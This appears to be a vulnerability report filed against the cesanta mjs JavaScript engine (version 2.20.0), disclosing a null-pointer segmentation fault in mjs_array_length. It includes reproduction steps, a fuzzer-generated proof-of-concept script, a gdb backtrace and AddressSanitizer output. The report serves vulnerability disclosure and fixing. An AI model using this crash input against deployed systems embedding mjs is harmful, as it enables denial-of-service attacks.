Open
Description
The name of an affected Product
mjs
The affected version
Commit: b1b6eac (Tag: 2.20.0)
Description
An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_array_length function in the mjs.c file.
Vulnerability Type
Segmentation fault
Environment
- Operating System
Ubuntu 20.04
- Steps to Reproduce
git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan
poc
let c = {
a: 7111.111, a: 7111.1111,
foo: ffi-= 62.1-11,
foo: 1.1111,
foo: ffi-= 66111, a: 7111.1111,
foo: ffi-= 62.1-11,
foo: 1.1111,
foo: ffi-= 66.1511,
foo: ffi-= 66.1511,
foo: ffi-= 1,
foo: ffi-= 111,
foo: ffi-= 66.1511,
foo: ffi('iit)�««««««o: 1.«'),
};
run command
./mjs-asan -f poc
gdb info
Program received signal SIGSEGV, Segmentation fault.
0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929
6929 unsigned long mjs_array_length(struct mjs *mjs, mjs_val_t v) {
--Type <RET> for more, q to quit, c to continue without paging--
#0 0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929
#1 0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2",
src=0x612000000040 " let c = {\n a: 7111.111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n foo: 1.1111,\nfoo: ffi-=\t66111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n foo: 1.1111,\nfoo: ffi-=\t66.1511,\n\tfoo: ffi-=\t66.1511,\n\t \nfoo: ffi-=\t\t\t\t"..., generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044
#2 0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2", res=0x7fffffffdb80) at mjs.c:9067
#3 0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406
address sanitizer info
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1337947==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555557938f bp 0x7fffffffda10 sp 0x7fffffffd708 T0)
==1337947==The signal is caused by a READ memory access.
==1337947==Hint: address points to the zero page.
#0 0x55555557938e in mjs_array_length /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929
#1 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044
#2 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067
#3 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406
#4 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308
#5 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929 in mjs_array_length
==1337947==ABORTING
Metadata
Metadata
Assignees
Labels
No labels